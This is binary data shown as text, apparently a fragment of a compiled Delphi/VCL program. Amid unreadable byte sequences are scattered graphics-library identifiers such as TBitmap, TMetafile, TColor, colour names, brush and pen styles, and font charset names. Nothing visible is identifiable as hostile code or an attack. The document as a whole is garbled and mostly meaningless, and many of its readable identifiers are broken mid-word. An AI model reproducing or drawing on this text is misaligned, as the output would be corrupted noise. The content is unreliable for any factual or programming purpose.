΋S6M�� $�<$ u �{ t�C;C�# # k*#0� be	T � 	d�S`5t�=���_�u 8���&�lSV�`�O���~/�� �~	�0 �d ���"�Ի ��l����=  �V�LSA��
�!݂j��
���HEdg\�L�rD��/PP�[���/"U �E3�_���:$�^/M���h �wM�L hgL �K�,E�i�i`w.��N�0�3��b�@ bP��$b ��bM� �� �BU��0i�"I����(�,� �E��Xt��QWRs�W �b��f�@f���E�Znbڥ m&�*�t2 �|v� �5�	 % O%Z�%`$� �X� ��� ����*% �L  &��B^* L�?�0�E��3�Q0S�i$6���!q!�Y��V�6~r � ��A � 	 V$ < � ��@�@4PP d� x � �@ /��<�.���h�"�O>��ҋñ���[ @#0E�����Eb  ��ԡ@�\��] Q�@'��Z�@40( �@p�0��tF������ �mZ ��ie%�Vb�<	��X@XU��;&���R *,��e/��\ j�	�j,t`��=�Ls�U���k��#��+ ���DV WS�։ˉ� �6�O+Ow
���2�O 9�r��) �W�GG O�ǉ�� ���у ��_	�u�[_^d$�S �K�C�B�$C[�p�	�y�ò �qSQ�$"����|  �� T��kB^�Z[Á����|"	 �  � (,0�$(��2, ��^ 0[JE����� ��l��Qv6�
��@�7
t/���0�@n�= �DK`J�@׋,� �^O&/0�& � � �80�@�,�U sQ�}Q�Q0���Z 8�k���p �J+7 ��9�� t) �� ^��Kl'Q�oKi�hl誉��hp; 
�j �҇���T )�= ���Q �7  40�$ �P� L @�M Q�S@����C ܩ �@�(hU�L�A�0� �d&�N����  h�F ;t)��! �E�Ɖ��E��'��#K��:�i�	�Q	r�_&!��0HE Yf�v	�Ph��da �>&G`�}� t@	% �x  3����E ��}� ���� ���rs��cU��u lK� VV`� p���C�$S���Y� PE�=�B�� ��aM _0t��6�e��K@P�f@<�0�18@N�8 ��T6 6tvRmU`����t��E�I�Q��4F�@��x (u5�]���0�R7�@��X�� yD���B86�2� �`Q 4 �%X:p@0 �@�N��t�S�/�Qa�9�Ƌ���`�_�� ��V�3 و�
� Uh�ľ`���qQ �d�b �^�^V j�FP�x�� 3�3��	j  �؉^��u4藅XU��(��i�8�E��e
��"Ԥ5�"�ܖX �Z��y �
�Z� } e
�Rt薥 d�q����y1SV0荾�	�~  t!�~ u�� ��~ t���  �F ��tP��4Ӏ�@�R 	F8� �o��~8\ ~���x��H �9"�SK��2�F�2Q��t���q��(fK��E��Pj��m;!-��t ��a�O �����
��u ��hK�؄�u2�0���oE$��� t
~;�S[�0PhL�P �BcH4�S�U��� GDu	�]�j3�) ���4�@	�� B���P
3@ $`�D=0 u� �[�t 6Q8�
�@�R$������f�=�3t�{��� �6� e0(� e�e`j�P� 1Ah 00�� ��B�L��`+`ٴ ��#�I T �T��W+�F�?��* �c�@@�P0�U �P(�U�P ,�P � 蟅E]� hS�4��@�E�����`�#i�Λ �����Ԏ�龔FU��P��W1�� ���_P�DK����E��@ѳNu�C¥� �@�<��؋�	�D$�� bX3���& ��u�
" �D$P�CQ�j@h�H Pj� �����4Yx ��uE�C�xu���S P�� T0\y ���B6 #�6 ���(p#:�T`E�D����A �G$�	s������ow& ��5 �\5�h ��@� �{ t+��VJI ј������sPb PߍC��� �谠nC>���j� �$@��a����	5�����c�@4��)��(>0;Ft6��u*SNhCh�p �� ��}J0ٖӥ ���f�K �^��9�;� �C�H/@'0 �@�螇Ð� �� ,0�e{1�`�M�z�_z �C �x�.B@�� CCDu
�2 �J�� W���f����`O;CP*3�� �_ 	芻
��-��	�Gt� v� .@�X`�DK�8�Wo �! �`�*pN^ 9H"���B� ֗� ��G uf�d�A  f#Ff�� ;�uS"��^2�0ǋ�Q
��^��V�@�)�C�*f�K��p N��|F3�,xC��I GNu��P	/ $���CKA7L�K1�a��> � ��	 �!VWUQ� ���uu�T�C�,F�.�XK��|&;  F������3 ׋(�UK� �@;�|!��& }�Z]01��Hh;�F .�@D Sh�Sh �2�Cf; E�������A�!Sh  S h # E�f;C[#�#0��8��� ��Left��Y Top 3n�l%N��Q�v4;�$`�Xؐ@�!c����(��֮��g�F��f uUD��o �����u6;_u1�!e� $�uߨtx;hZ�J�	��& t�{ tjV�
 =:�0 t��f����,^�@��!� t3�  t-�G��A"C3���0����$轘� EKu�3����1P0���4���!
tRo�->[�6 "	�4$�T�i��8� ���� �{V�3Ǟ�#�� �#�311�#�	 Y��-�D�� d�p�$	�H/
�Κ47��.T$��!�'�B���3ee
?�@�T, � �|1�S�z �W��} 3�;��� N;�t�ג��3ˍ |?5 0ql3}hf �N�f�f��t'8s�v�M��|E��#��4 �軌�Mu�1�����&%wz(�Ĥ� �)���Ԓ@  Ktt �8�r9 O��t��$8
��@@��8�(�<(p�x ?@ �[���I���� K}�u� ]�{  u%���!4H7t �@ ��
 WV�C P� D��]��EBeu��b@�  P 3 � 0�@�X1JXg���kF �0Hg" ��D H0�Y@�,5��"L�O L�) �!M
M_P�);�Wq�?Cf����l��r ;�t6HD�s�(�� ,;��t�D`0�Ps>���-���3A��FP��� qo' '�LW�h>0D��0���A �GA0� ��莧	%�X �� �  H�wP)�GP���A���L O�uW��� ��=  \N �

;	w0uGG0�"�, HB	�<D�S@�J�" J`L�SHp�B�%;C@u�;CDt:�CPtG�t�u� aP���� Gz�7 �C@5 �CD�� ��Kx:<m<�S8[ÉB!P�]�%��� GlP&F3���f ;�u�-0u4 �CNu�TGR0�F�� ƉC���	$�0�QJG��@C�w�E����2# ��2�u�=1#�F�e�@ � F�R� ��B/. � hAU23�Uh���1 d�!��u�	 ��l1�@�M1�}�P�U�3E�"`���1�b�o$]�Pd�h`�h�h��� �����h���=�]��z���|�~� ؀yD,�� � ���/�E� � U���U��,P�����w΃P���� ~ ݌~`�u�L�P��;U u;Et�lJ氶�Q �*��ppn�gE��i5?��lP�)�"E�'�E�0�0�3�Uh��/ 2d�"fu �}� v�~	�E���E����Q0�E�Uh�;`8�ϊ@P�v�@ ���u����% ;u�$~H ��	U��M�I�N"#��l�_i�P ��3 �ÙE�U��Eؽ0A��E�PS��� U&� �؋U� E�U�}� u��;�t�E�[t4���d`�M +�f )EU8�V� � � !�! � �8Ph�� � �
�E)2�U�)�)>��� ��3���a��D��� �!1���h�b ���g����b8�
�BJ 3��D ��$@��"�}3�-�A�st9�C� �G�"�C�:S�-�,�^C$�C,����� �� f����B���(����&�0�\�F �rE�� ��P�L_�*C�
h��\?��FKuZ�*a0 D0$��I64��0�>�&]Ð�ςX6� �����S3�2��	|U�A� ��U�L�H��P8�LL DUh(�`.˨{�89 �=��;PlA tv �@um�@�o �uJ����y 9 �3 ����E��E��E�\����E؍�dj� ���X�Ƙ��D �xP t l��&a/� �`�*�. �6qO �H�T腩�������P}� hdh�E�yÐ�nuk <6?Q�@���.���f�=�sF  } |�� �7� �H�6 �����=wqt
|�b�U�m{� �74�&���uL �1{1uM
����Zb7�4� Qҭ ��Ԩ F� �U�;��Z���K ^��Y�S�;~T�Ѧ��'`�09C�،p8]�t)Mc��P3 a�8�O�g �	�T?�3`��P	G`8�`�```#�[` � ���ܦ� � �i d���U�zB���@��@0  �R�;B0�u�(P�+& &P8&Pa8& 0�x8 0�l4�<4P<4�<4����46P4��(���~��z /!�Ph��%PhDD	 U��Y�Ⱥ�� Ë02�V� ��'@,�' '@�'��'P8�' :''��'P[ ' ��'('0KRI(�6�Height  X HorizontalOffse �0 Vertipcp_Widt}h  y�
?K���
;�uB �kH�D6@7�_ �0�O �f����v;�"~E�U��M�uw�I�_bh^����/�e�F ���HP�[� �<{��W�C0�X���C 8�/� <� 4����\ ���B�P<��{P4��o0 1�P�u�9��A��X_����+Ћ�8K ���? ulj@h.	  j �l��  ��V� tF �b�)���P��F�@���F�^
��( e�C ��C� ����+�= �  |ۉ5�R���S$���S�4S	�Lv(��P �ÐTPU tilWindodw�<J�h~�ʙ P�(	 P P �o�����@�
��n@ ;U�t `#0/0�r��#h �Wq
 ] 8�j P,0j �� B �4�H�As �f�r}dk��	Pj�S��K �ø�(���j�V踚 ��V��m�����O��5|-)Uh�Bv[XuF}� ��xUf� z�V3��-�	���h3�c$^e��������`�
<��]
 (x�T\
 �2� ��U�G d#�-`�- �8f�� ����d��T�I�P�-��sa�aMf `f �\�@ � ��Ѕ�t���b0|b  �An+ �p����� �[ S� �PB��`P} ���<�0��*�j�� �@p@q�@r@s@t@u�@v@w@x@y�@z@{@|@}�@~@@`@a�@b@c@d@e�@f@g@h@i�@j@k@l@m�@n@o@P@Q�@R@S@T@U�@V@W@X@Y�@Z@[@\@]�@^@_@@@A�@B@C@D@E�@F@G@H@I�@J@K@L@M�@N@O@0@1�@2@3@4@5�@6@7@8@9�@:@;@<@=�@>@?@ @!�@"@#@$@%�@&@'@(@)�@*@+@, �C*q<t�(�x ���9(S�- È TColor���� �
 d4y@ @:@ L P PT H �7@ P� � EIn validGraphicD\� �\�\�Opera
tion� dH 
TFoPitcTh� �` 	f pDefault 
fpVaria blefpFixedN@s���+ 
	D Name$��  Ch8ar�V � �ԂppStyle � � fsBoldfsI�i cfsUnderline StrikeOut{`
��$7 PpsDI��< 	TPengpl8 psSopsDash o7t	0
 
` ,  Clearps InsideFr�� �p�hhModdg0� �g mBlack Whi tepmNop� tpmCop0y	 
pmMergeI   ask0P  @�0[  
H  Z  �Z0
q Xor �	<q`� TB
rush&q \� b&1 !bDs�z
bs�Zb sFDiagon� BP8ross�  8q$	�L��0 8 1\@A��܇A �A �    ��B T�kPObject`cЅ]Ag �`��x I�@nv!ifierD @ !#� �D���  
�=��7`��A�Ā
B ( �P  $ ��^��
"B�`X �� � jb   �-�< �"h0��H��p ��&B � �!��0�C��n��D#"� �$<��	%B |  �* �<�c � ��!� M�~ C���  v$`\ 4 @?  Size NT� `�� �"�*tP���� �|�0'|� �` �P jccqA Ax(B � �� AAa@) p�K 8�T z\��5�0 � �� � �-��7t ��� P �f�b  Q *\4��P@lq�!X+� �P(a�St,C �c�Q*8��\�P X��t-�p�3w � �2� TCa^s\Pyӡ��� �p16�!ؔ�� P  ̶, ��$���ETC� ��J�O�d� h�� �TProgres�ajg�5��� 
�tHa�ng�Run@n
 psEnd�	�PHH HpEv�� Se]<T5�a p� Perc1 Don eByte 	 RedrawNowBoonRTRD Msg�ng k$2�T)  @� �̃��P � �@T�$P�PX D$�A� � �` ��z��
0{
����� � B � �  �͸z&� �� �O`��q  n��� e& Pp�� (}\��A�p�THT\<�A  �GB �+@9 � �I�� lJ0� Ԫ@� �8 �$ x�@��D �V ��`�^��\�� �:B�R���yR1�!�
 ���AZ UO Y 1 9 �T�f&A��� UzHA�Tq
 S ,T�$P% '�TrRBT!���E���  � �s	ictur8x�@�� ������� \ ��\�@X\�TMetafileW4dt���Xpt�4��8�  'A��@TCS�edIm�$[�`��  .� `�
LUB � �`�b ��`�h�X� 0 H��
Y�`1`8 `S� `6D[� � `|V\ ]� a@0t`bP �cB ���``B �( M� $fl 	�`-���p��"��������  t@�(�jka TBi	tmap�Q4`�T��� <@��u�@q� @�wB &Px@1{@ �� @T|P �( �����4� 8���@ �TD �B 5�~  h@ � ?�T�0�T0��F��H�   ��H��� (�T
Icon�2x\���� 4D��X DQe� �R$�D1d l� �U� �(���2@ D �@@ �DQ䐬 � �� � H� ���6��t;� �F tP�NV��ÐdH�� �0��( �s"ou�ManIr���щ�1�f ��2BIu �� SV��t ����$� ��ڋ�f�N  �FP�IT� Ƅ�t辈 d����	��^[<0�5@�1 �R����~��� % ���� � P�@S U���� SV�ډE�� E��P ��$�Y_
�� �Á
 3�Uh���2d�" �@ �E���E�� 
 �}�  t! f;puB�H H �� ����n� �tI�'uE @ ���? GU� �R�3҉ P��Pf�p �J �P� �� |  U�#E��@ 3�ZYYd�4hߞ �!� ��o'��� �^[YY]�� ���8 E����ddE � ��� �Uho�1d�� ��Hd ��x  �E��}� t(�0;E�u`� � �B� �;U�uM�� �� �PvR �b�b ���&��K \ �@~vb؋P �� �°@�W�M��Q�A;��Uh�0d� �{p� 7 ���s ;�t��f����!M �l�: �@? ����F� _'1�x Q�v ����u@�& �ulup^;�t �G�~�L�k � k ���T�k�sk@�k �%�kP]�l0g@_gd`�g dRX��t ��F(� ~ }P誀�3��F�
��u�o`�o@�o lo n �P!6 E������k��y���P�����gP�sR�C� ��$9�@ ;E�ס�F7n��
-&��P�R �]�K� �|C3��֠T�T �  
FKu�0�� �$�£�Ѓ1���H ��clBlack �clMaroon�$pGreen�Olive  Na0vy00D0Purp0leDP$0Teal��4�Silvefr4P|cl�D�L0imV 4pYell"owh�Blu$@	� Fuchsia�$�Aqu �pWh}i�)y�0�8@L0Sky_0<�Cream$�Med��0 p ct1B4or�0�Captis0�ppWorkSpac�@��0B�groun�t�BtnF+ D�� Highl ��PW
d7@�T7ex��0�0��,0DefaulPM�Qdia��  �Ina"�D0
bm0��p�p4q`- @pHo?tL�p� pPzQ0~����� �x2InfoBkPP�0��ph2Menu<�?Ba��p�P0�P�N� �ScroPlr$�3DDk��A��3DAȀWiqn(��10Frak�X�0A ��}!%�	 P�Q�j3�\tl�]�lxP|@Sf�x
 t
�ЋC�S.P ��tR�_J�$(`�K |PAN SI_CHARS0ET�P<DEFAULT`�RSYMBOL2p0QMAC�,�$SHIFTJ IS`�HANGE`UIp$QJOHAB�1�xPGB2312�x� CHINESEBIG5L�GREEKL��TURKISH��HEBREWd�ARABI�p`BAL`T�`RUSSI1AN`�lTHAl�@ EASTEUROPEX� OEM�`j��u��l[B@t@���A�CV���,#@�C�^�� ���j<V���|�$�C �|$�   |�K	�|$u T0 0� D$�C
�D $<�T$� �H��	 <�C��		' $ ��t
��u�C�
 �  �3�9�`G�4{N�:3�������d��F�FDZ��� �F]OKo7 O�LiM@�VD0�D PK5� |0 (����� {  t�C ��RpHq:�5�	���}*��= ��#]i]�U }�@�"`K�	��0(W��S@
��ЀI0�@;CtJ; B �T�
 �h�J �3Z ��Q`% 2X 4 XJ�d�`��H
@�p1��BM	_^�%QS�j���0��pZ˺`%Gv`�v@��2 ��v�V ;Pt�P�Z*No;�S U��U��U�$��f1%f`C��0�x �3% �A�0	+p�%P�>Q�E�T��� �@t	�E��,�	 �V 0���E�0 X�0 �	��@�E׍E� ���#��"�H� �cGu�E��7���U��E���Bk�E�9@�� �� �E�	 �E� � �hĕ + ��E�-E��-E� �E�P�AGA�~aɅ !1��>t m�u+%p8% � �J �����(��[�lizXSV��ԋ�Ա+��	 ��ّ��,�>FrÐ�,���# �t$\ �0��%Ƌ$Sy"�SV�0��� ��tA�: W: ^3ɺ�\$�
\D$,�&ֹ�s> l,�$m�	878 ��,K�cCP(jH L� P��D����x0r �! V�� ���X�) +) >@�P�¼ ����$��t # @�b�$�D$`@@$�0[Ð�8@Q~D�  �\$ �- Hq�b0�V00
 a0��,u"�4��v%��,��%%�F�EU% ���M=@�; ��e ( � � (  5� UM��3�' �@�p� 5q W�� 5|���b�. �O> ��eml�	(n42 eP �D�_��� ��D�^�dށ�mT �䔞 Av`tv@��2 �����4��c~Ac� ��l�1P!�6 �tux�p0%�0.)��u@8	 �@�E���E��$	�E��4�� E��E�P�4YC%�5T f0���d�%$@ �VS:���E���"m�P�R��� |� �`!�B!��.|!n' ��6�y4��rV=�"����/+� ��B�! ����9@�7 �7 �BiQ ���I�$tx���1�*�Ĳ�@�p�2m �ڶ!gA�# ��3 �4�E��� ��[y � �BF��"g���  B�� ��M"�@)+��� ��y`0" 2 y y ɠ''
�o��n'�T�蕰203��`V�B
u�
D$ �!Y���������05낤 �Uha,�2d�"�R{�2�
�E����Ql0�d��p6�A��Ѐ�rt	���; U ��	 � ����d103��3�E�P�?3�h˗ �0��8��3��L �:��<u�D$���;�b4 W�R`](> �3ҋ� ���G8P�>����n*߀����w�~�F|4�G8�F! �%���!0!0�!���!P!0�!`�G    � �p-B �G�ס��+�W0 �w#� w�vǰ�V�+� ֚80YX��  1 �F�\� �F"�T �L�F�� ��Ӏ���- Z�c��#���"VW�M�u"}����PD.���a �hT�oS R�W+W 8+ 
  U��BR
 V+V�+� RP�CP��^ C� Y]�� ���5�@�� uEP���4��uJw�` /� vC �&C(�5Hj0������ `�K  E�P�0,��Ͻ��!�>	M�� 0�V�p�� ��`I�P<�0�H� n�� PVs @�`���� ��?�t?0��? W70�=)�� �\`	h���9�)CP0j��C�q� �E`@��Y0WRY j[P�[ T ��t�� 06 �EP�EP<@m���]� �0E �յU
&I`LI0�&��R�� �<`�-�10�1 Z FV�����I�1s<�@4  ��� ̋Y�B �	mYZ�.���, �h\A�$8��%1�U�{ P �E��}� t@ t~�dh#( :0���+����Ed�X ��!� '0Ba �K��A��QV�Fyvf0`x2�=�w ���1��� �l� �<$���L	$�蚫YZh6 ��G02�7 �AOXA �02�6 ��*�����?@�k!�0��/VT�?0�?C[�2�! s>H��   ��"C�S:�t7��+6M\ ��k �� ,��`� ;p�C\� \ �0RC;�t?����M�J$�CD�C{C�c�� �K�s�@�4�+ XBQ��� ^��"$� x3B :�tS��t$Y4� ~ u�X �FZ� [A  �ύ���:����R��EN� �� n P � 
^�0^p&f�x2 t
� ЋC44�S*`,�1S( �����1�jE0�4,@���0��, ��0cί"0 �x�, �{% a@"I�j�u$!� �'#0N# j iKS $���t$ *��&0(& %��d���CtW�����V�N  ]  �92P5 �  R�M�� p�˨�K�'���F�0��z �H���GÐ�R$�0�� �� Dj�Uhz5�TT�=
h" �.�-M�Z �Z�Z�Z  Z `d�4 ��vS'���{�b�ZT ����S���	a 6aP� s4Y ؅�tSj h��� �4h � ��3$��/�C ���#�.�S�	����P]����l)( �`'v A0譋���'%�08��u�Li�D[����S�(}��ٱ
j ��5�!
�
 �
 H���70aE�PBj�P�R6G�tj jEB���P�[7 �,�bC ����}+� { �A�a5PQ��290�}�-��` � $S |��N�+td���E�P�q� ��
�E�P�b��h��E� W�@ j � x00�, �, �
SI (��t
V  ��`�� $ ��˅	 ��� �| ��8Ð��f�� tf��t� u
�ȸ� ���3��I� ����#�� �y����R�1�x)��	� �u�]�E ��`�F �8��C ;],��	u(6��	 �1$�I���x3�EP�RW[!�}�8}Q���) � �g�U* b860   T$ ( ,5A�PW��� aW:�1�i � y@� ��ߞܾ]V�q��P= ��0V{� -!P! ٿ@��V ���($�)� T �E�0@z �}� tuj�; e'0� �=P O0  %"ǂQPV�]" G�"(D" q"�do" �	�GX �h��W��� �E�h� �]�S� -dF f) VP%� tBW��[ �E�
 @�
 �}� t��2� i �@2���!4Q+ F+ 	 �+ ����ڊ&E�eK( �	� ��e��� R��Y� X�Y�X �	��@  J��u��Gv ���(��5� <$�?O��~0&����� I��X �Z�X�Z � �AOuI��8 }( A�
+�R @�� @�3����-�#)V��DԉU�����;/�.�M�I0x3 � t ����� ��Iy��S1� �ǈ� ������,� ��#�:��"���fǅ P	 �	  ��H� �@� ���J����!��iI<�Rjh9%�0�����V��>Pj� 1�������� uL��P��Ã�D$ �C !� ����@ ��f � ��60j Ĕ �4p�t0��[40�  ,bp� �� �;���pG�� P��S���^�E� �=d tw9 �R�E��Uh
=2d!�"�P��A ��|/�����3�� C�D.��@0` ��`R Jh�%=� ��+�\;�� ��3 �f�$ ��t81 ���WS�A������Aj S�Ej f
�D$  !  S ��/ �f�L $�T$ ������� f�|$ t+� u�����xj	�T$� $�m���P �u��Ɓ�v���0Q�; @$�6TjS�`�- )�<$  t#�G;$,}" V8� S�T�P�Qb$��"�Q�?��ڃ��h�R� �@� �zB�9 U��j� B f�@�VB�)9��w��
��?�Q�}� ��(����5²�"W�'�7�[r-�}x
�EH��>�gU3JɈ�o�a��" L(; ��a ��� �f� f�X�,��Ր��
���@g ���@�
 � 3҉�@��� ]��@
 � �[,� �� �@�� �@E�m�� �jZ�`�% � �> ����� `� U�Ep%� �mE ��u�� x@XC�FɊ
�?�@� +�3ۊZ� �R +Z�u�)�6@��@P B����3�(+�M�	 ;� &��~;�|��0�L0� 	��~	;] �~3���x� S� �M�^5�]� ��e ���D/"$cC�$bU��M��0 �V�Cuj�͖%�j��@B �����S�P(����E؃}؄f;`UAQd�P�+�j�  D� f��f��v	�E�U;��i�*�A\L 7�m ���������(��@�c�P)��}��L���&��� �D��B��;] �+;]�|&FU@��l M����'�� �t�u܉]�FOu�0* �A��E�� �! �! ��3VCԏCc!E;� �P� �E+1�f`o�S� ��H�]ԋ�$#�!��MȍUR�A�E��+�	P�*7E� `̸ �]��]��E�QE ��m��U� ��EċE�2Ø	y��0E��,�p}Ћu��WR` �)-��S�_ � �	 �	   � W�E�P�E����  P�h���q��8}�� �z �U� ��m-�� ��1 @J �.�J# #X�#`jC ���*�  ���� �� Ѓ��f3 
��;�|� ���X���ڀYT$TjTP0�/� ��^� ���?��@|@.(rV���t$�
K �^�"��3ɺ(�����1���C  �C�ƃ� tH��r-�  r� f�C �$� �s �� f< f �l$f�C� C ;C$ s�C$�{ u!�S}�B5c��ȋC�$�ȉK�"�T\i�SV��U؋M�Z
f�E�j#�0�E���$ѭ
yc��{��
��P�+�U����l E�~ً�:�n ���.�( 	�O�EyEtR�����h(�( , 9��+C�� ]D ���EFr�L �}�)K�N? 	 &�&$��)��BxS�]�.�A� [����S��U�� �M����E��v�*��|� ҂ �PV��C�d����G�d��SU� ��ej�M�U�R/�U$A����$�BwB`� ��>Y-��� ��� ��� �	�M�3�q`�Cj�M���M� �}� tB 
�����Uй� �Àf�Eؼ�E� �Uֹ��@�u��ƊP �U��P�U�f��Pf�U�W TP��E#�9U��.@ 8�W	P��U��M�UPUn܀P� ��a~�:��7c�P���, `��! \��� ������A`e�A��$�D�	 ��'�"2�S V��t����b�O ڋ)� � Ƅ�t"� d��  ����$J�@  � t
�؋ЋC� �#�S�@�� t7�0�X � HB �b���
t��  ���0Q ��[ ]�@�R4��xH�>	:� �@0�>
 DPU 聎Y�Ⱥ�mH&,N$( ��Data��s���tt��� �&�	 ;�� f�;E�� �@�0*t$`tpu5p�b�h y��
 � �dA ��] }�I�y�N �D'P�' B$�'�y�j '� r R�	;�u�ZXqu� <�P�C���<��p�&b�a ^?t ��J����`� �,�" p ^d�3�Ð�@!�Q@V� �ʡ(cFA� �`�h.8UJ�p��0Ta`? �������a h^��S_ t �]S�]���$oC�S]�/�T ^�PUh; �p�pË� TX�`ʋ@6� ����P���:P!t
�P!�6 Äx`X^��:  TFileFormat���@h y@ h6KB��x  ?� [A @:@ L� P T H �7@ � �LB  4�A t�A  �A `�A  ��sList�x=3�Q �sy���CiG 1�#
����B P�U ��(�F �yC?M���, $ a*�.$P���$ EU$ ���$0$0",$ ��|$1�$ ���$0�� $ "�$ �t$�$ �$0�$ �� �E�R���  ��D������   wmQf`e�ico`bmp U�@�oM��| E3��֋��+5e��� @��FMu��Ӏ�s�3�g�~ e> ]��hl3ۉ]�����{�M�bO ��b'��/�4'�� �9Z�C� ��� E���s	U�� �-C� 7} +a�\ Q��>$ ��r1��h\�����ɔ�N�`_K�� |9���64� 0��5��c� �=R���S�ږ
t�9�u�3��`%�W *�z��)� #��FD��| �
�  �G�
O B TClipboard	C�Ry~��ia�� �FP �E�f��k��@Z �f�[Iv-�"v` ,�V�my@�F�!�� F�� �/"��6 ,0`o�`�� @���6Y1��!�� �1l�@-�: nQ�:��;@)i �L��c 8O�=�vF  u� Jt��u���  � `0�跬���8�*�8���g �L�� A`" ���Y�9@�Fl8 G3��#�7GC��# DQ̭ ��* o�c���ST �`+ ��g8��7F�5 s ��E�p�uGE Ro �|
C���� PH���s�J^	f�� G"�^���6� �f�! � �\` w ���C�0  t��N \���HP��I� ����7�� ��� 
�XP�@�P�X�P  � S�P7�Q�c<{QF. =�P:/ Db����'* �M�Q�%�>]�����ւ7�s!�����"'_^�����u("�� @
�^M����!��< �%�2j00� ��ӯ	 ��t,�-�P� �{ �����!�-xf�{�
u�*�{OC��-tC"t�$�S t(�#P�=E��1Uh�S�aQ�U��Xv 3ɊM��UD�@�E�! ����U�n#�j� ��U���tA�Q�'U`�a0��*��)��1E�i��p �1�}� -t03�fE#3� NP��r# �e� � �N�����XV2W����{� �T$@��01�2ı?� |�8 �$ �$A��1й O2D��@�Fg 3�M<p W��AB)�$N�>L@;2C�0p6 �{ tg= �y����.0�x ��?�7�|�h�R+Ph��U�_zLUz��|8|��H��t	��x,����� P(1�(%�P��F��k5Ep�Mf��$8Ajg	���Uz ��Z�� �aB;�	��� � �� � gϺ#C��:V�'��X
�7�K��ifl ��}6ՐT!�I��P޶	��U��u~��0X���L����xX�E( �} u
j ��8-�UhB4 2d�"	'X!�?� ��ua0�|! j"�P����k�d,@s  �7jh� � P'@�'�Jdy��~ �G P�7��,:9 �D@�7p� p I J�p��
p 
 j�p '0^p� �p@h�9 D@Gp P�Eh�,  O��3�3��D0��D������� ~#Shd(V"hp �E�[;����E���]:3�V [� E�؆���~��[�{�K �!1�D���4���&`7q0�m-B�K �}� 7/�.7�E��J
P\�zJ�7 ��+��ٝ ��"�"� V�L31GX�V��[�Բkv�AlD�xN �h� ����F,�F!�7�2}) ���x�uA@�F(�yP��.��h:# xP (���&�4��$j3�@(��x�O�J & & P(�S (�@,�C,�R�	H5CޯC(�C,6 ��y�<$;�G0ǎ�D�C"��.[�BA� �WU���$K�{( ttA@� j�V@;��
�P�g� ,� N$� ��|$� _^�L$ �D$4P� �
P2 �ױ22 �j�U Q� 8 ��P-�$A8b?!L�x tF�L�8Av ���~3�)D����PW�p@�$�� � 5"��[* �b�����	F�hgh ah`�h@DN��h�T�h0Fh0�$�Huh�4 �A�&ú��� Z�}�n أ;� �x( ��À���t�B �3 �S�Ĝ��1u/ �J �[@(� u+�C�"u�C �3TjdP�6~ kD$TBD$Pm P���� h�	  ���F 0t ��md�Za`da4|��LP:	�'�@		��Ai+!c�x &uW1a���J�� A ~��`�)I�ȹ��f�f�t*$ "V�Qs<�P�۩ �S(� Bx�ǁ;���Q ��^ � Z AU  P !L�
� � T � a�:(���*̐m �t�P�O�H+� ��0yS��t�h3R ��t  �S|��!�(L X �CQ�~ Թ�TJ�<$�Q �'�t `��/��$�� �?��mZ�#�'�F=�Xp�U��d:�� 5J���}� EMFt�+��E��k�|�$^(��^_hU�"�E<0�C�� Mȃ�d ��d�M �I�'��P�@o���{���i��f�C��+E��E�+E��C�Uf��m �Uȓ� �&�=��J�+�1�h� � �M��	�� ��
�U޹���9�}��� ƚu�E��"�� ;E�� E�� �m�	�R����@`�p�,�M(
��!	f�U�fTf�}�  uf�E�` �E�Pf" �E��U�+�P���C��� �� �E���	�E��E�ڍE�̥G��d�Cq�Ց� �j� PjdP���I@�#E�J �E�KP! 
���T�T�:�T z�3
E	���@��Ќ:US6�M�)���L�;qE��)E��`�U� a. E��U���l���# 0�er
�E��@e,a��针���Y U��P,��J���`� �(E��:2�
�鈰"� �k.wmf��'�t�x, t�cT�z� 4}�7`V3趲r�i� v.f �4�;.  �D�H�" C(P�,p�� T$ +T$�+P $ ������H�@e��C@x1�P��u�p �?� R��	XdPV�^	�F%�$�5�"V�BP ��seq`%q0� ;pD� ��);6�pl�<� �<@;(p< �.6�p�<���C`�C0���@,
� H�$V�-n�@q���RPjU ��Wuڌ!�1(�B��+���d~�-%�$f� ��>  �e#�u
�|$(I%�I` ���W&F	\ ���� j�x~d�'VU�''�tj W�e� �FL�7�FZ��F@�@f�FB �F	  �F ��V>
4��
 ZQ�~��m#$V� ���A� �^~�,>Q
Ą�ɋ$3 0�#V01+$M� f�#1�&�O�v7_(pShD�E��}� tZ��g&A�dX��$MXp�����C�-��4 �$���J ��{���.�dFܪr�,�&3$ɺA��[( �EA&f�Cf���5�f�Ep��5�[(���� ���	�0�"ނ�E�O;��� f�pk�!��!���a�e/�q3 \3  ;E�s��ύ����+az �+a�P +A�f ��6P�+ `� N�Y��0  6H!���"j�NLJu 
�ЁF �I�/%�� s(�b���E��F�� Z(�E�+E��f�F)��,�LN ����Vs(gf�m� }Kfxy4 2;� f�X$�Q�H��$D5gB�N0p�\ ��B @:@* L P T H� �7@ � � hB �A ��  �3B |� �iB TB itmapCanvas��d���XB   GraphicsB �2���v^,6�2k R��H�� |Y���?=+���Eȳ�t37
7���0�a #���=��� M��}��u��&`9& �0� ��Q(�(xQSV� �5  th(0w�/�Uh�} 1d� !�^K�� $|&c$�" PX�/�R(�R;U�{�r& �*u�~`�~`�V ���~�]��_*Q����������wX�Ǵ�/� �ǜ>��48��@�O^Y��oK" �4QSh�� xG�~:�7B�c�Uh��d�2d�"J@\��� P�h� ` j��`@X� N %��S��$�0BYă�f (u�>�ծ�1� X�� С@��@Uh �j^��@X��B@;@X�@g����0X�� ���� �%pp�wVS�M� �B\��\'�E' j�) ,)P`S��� /``�9m4��`���`�� �"�a��5�B��!��@�� �t�K�{ u�G��'���'���A!Fv�U�k FP�p� FD�=�Fd�9� ���Fl�DqŴ 
B���
RAP ��7�;Ct��^$}/C[n � /n0C蕪��Cq�����v	�������� f�y&��� �� �y/kҹ� z��_:6
P�A j&V��D�v �E��+l��k�JPS$<�ޚ oA2& �� n��	5T ]k �Z
��ӈ�6� @(tB�x@  u<f�P&f��u�@  �@D�(HV  u� � �DD���U�'� �%Et	 �k%�  P2
�#0�P ���:T� S��$�(�xa-TY��� ����}�i�\� �������E�P��"����E���cr�s�(s^	 �	 �UfBf��u&�=j � �}LG�L ��_f �p Ti$�$@;$ �,�w	躹"܂�Bo���@(#"f�@$	 �x& u#joP ��P � � f���f�X&xU ܍p���
�F � � �B~ ( �W ���n@ u(T!�}� u��� P( ��(��"ǘ ��~}� t �P(��B��:�� [����2�X	� ��	�}� v%`#tX0Ph ���& ��� �8�#��	/��3�Q@�+��^ 0�=�1��t	���� u' �"N	 �>� ��@�>)��,TjQ
